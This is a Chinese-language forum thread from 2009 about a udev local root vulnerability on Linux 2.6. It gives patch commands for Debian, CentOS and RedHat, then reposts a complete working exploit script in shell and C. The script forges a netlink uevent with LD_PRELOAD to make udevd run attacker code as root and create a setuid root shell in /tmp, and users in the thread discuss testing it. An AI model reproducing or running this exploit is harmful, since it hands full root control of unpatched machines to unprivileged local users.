<ZT>Linux爆本地提权漏洞 请立即更新udev程序

tangye

Linux的udev程序再爆本地提权漏洞，本地用户可以轻易获得root权限，请立即更新udev程序。（2.4内核系统不受影响）
修复方法(修复前请备份重要数据)：

debian用户请执行apt-get update ; apt-get upgrade -y

centos用户请执行yum update udev

RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。

攻击效果展示：
libuuid@debian:~$ sh a 890
sh-3.1# id
uid=0(root) gid=0(root) groups=105(libuuid)
sh-3.1# cat /etc/debian_version
lenny/sid
sh-3.1# dpkg -l | grep udev
ii udev 0.114-2 /dev/ and hotplug management daemon

现在确认的是此攻击方式对Debian和Ubuntu相当有效，对RedHat的攻击效果有待确认。

最新战况请查阅 http://baoz.net/linux-udev-exploit/

tangye

哪位试一下？

emmoblin

能解释一下吗？
这就是a的脚本代码

1. 
   
2. #!/bin/sh
   
3. # Linux 2.6
   
4. # bug found by Sebastian Krahmer
   
5. #
   
6. # lame sploit using LD technique
   
7. # by kcope in 2009
   
8. # tested on debian-etch,ubuntu,gentoo
   
9. # do a 'cat /proc/net/netlink'
   
10. # and set the first arg to this
    
11. # script to the pid of the netlink socket
    
12. # (the pid is udevd_pid - 1 most of the time)
    
13. # + sploit has to be UNIX formatted text :)
    
14. # + if it doesn't work the 1st time try more often
    
15. #
    
16. # WARNING: maybe needs some FIXUP to work flawlessly
    
17. ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
    
18. 
    
19. cat > udev.c << _EOF
    
20. #include <fcntl.h>
    
21. #include <stdio.h>
    
22. #include <string.h>
    
23. #include <stdlib.h>
    
24. #include <unistd.h>
    
25. #include <dirent.h>
    
26. #include <sys/stat.h>
    
27. #include <sysexits.h>
    
28. #include <wait.h>
    
29. #include <signal.h>
    
30. #include <sys/socket.h>
    
31. #include <linux/types.h>
    
32. #include <linux/netlink.h>
    
33. 
    
34. #ifndef NETLINK_KOBJECT_UEVENT
    
35. #define NETLINK_KOBJECT_UEVENT 15
    
36. #endif
    
37. 
    
38. #define SHORT_STRING 64
    
39. #define MEDIUM_STRING 128
    
40. #define BIG_STRING 256
    
41. #define LONG_STRING 1024
    
42. #define EXTRALONG_STRING 4096
    
43. #define TRUE 1
    
44. #define FALSE 0
    
45. 
    
46. int socket_fd;
    
47. struct sockaddr_nl address;
    
48. struct msghdr msg;
    
49. struct iovec iovector;
    
50. int sz = 64*1024;
    
51. 
    
52. main(int argc, char **argv) {
    
53.         char sysfspath[SHORT_STRING];
    
54.         char subsystem[SHORT_STRING];
    
55.         char event[SHORT_STRING];
    
56.         char major[SHORT_STRING];
    
57.         char minor[SHORT_STRING];
    
58. 
    
59.         sprintf(event, "add");
    
60.         sprintf(subsystem, "block");
    
61.         sprintf(sysfspath, "/dev/foo");
    
62.         sprintf(major, "8");
    
63.         sprintf(minor, "1");
    
64. 
    
65.         memset(&address, 0, sizeof(address));
    
66.         address.nl_family = AF_NETLINK;
    
67.         address.nl_pid = atoi(argv[1]);
    
68.         address.nl_groups = 0;
    
69. 
    
70.         msg.msg_name = (void*)&address;
    
71.         msg.msg_namelen = sizeof(address);
    
72.         msg.msg_iov = &iovector;
    
73.         msg.msg_iovlen = 1;
    
74. 
    
75.         socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    
76.         bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
    
77. 
    
78.         char message[LONG_STRING];
    
79.         char *mp;
    
80. 
    
81.         mp = message;
    
82.         mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
    
83.         mp += sprintf(mp, "ACTION=%s", event) +1;
    
84.         mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
    
85.         mp += sprintf(mp, "MAJOR=%s", major) +1;
    
86.         mp += sprintf(mp, "MINOR=%s", minor) +1;
    
87.         mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
    
88.         mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
    
89. 
    
90.         iovector.iov_base = (void*)message;
    
91.         iovector.iov_len = (int)(mp-message);
    
92. 
    
93.         char *buf;
    
94.         int buflen;
    
95.         buf = (char *) &msg;
    
96.         buflen = (int)(mp-message);
    
97. 
    
98.         sendmsg(socket_fd, &msg, 0);
    
99. 
    
100.         close(socket_fd);
     
101. 
     
102.         sleep(10);
     
103.         execl("/tmp/suid", "suid", (void*)0);
     
104. }
     
105. 
     
106. _EOF
     
107. gcc udev.c -o /tmp/udev
     
108. cat > program.c << _EOF
     
109. #include <unistd.h>
     
110. #include <stdio.h>
     
111. #include <sys/types.h>
     
112. #include <stdlib.h>
     
113. 
     
114. void _init()
     
115. {
     
116. setgid(0);
     
117. setuid(0);
     
118. unsetenv("LD_PRELOAD");
     
119. execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
     
120. }
     
121. 
     
122. _EOF
     
123. gcc -o program.o -c program.c -fPIC
     
124. gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
     
125. cat > suid.c << _EOF
     
126. int main(void) {
     
127.        setgid(0); setuid(0);
     
128.        execl("/bin/sh","sh",0); }
     
129. _EOF
     
130. gcc -o /tmp/suid suid.c
     
131. cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
     
132. /tmp/udev $1
     
133. 
     
134. # milw0rm.com [2009-04-20]
     

复制代码

diyself

不是说，这个脚本没有用吗？

emmoblin

他们都说有用啊

sc66

有用我在Red Hat Enterprise Linux Server release 5 (Tikanga)测过...的确有这漏洞

snow888

原帖由 sc66 于 2009-4-30 10:57 发表
有用我在Red Hat Enterprise Linux Server release 5 (Tikanga)测过...的确有这漏洞

我在 5。3 上反复测试过，就是没有得到 root 权限，郁闷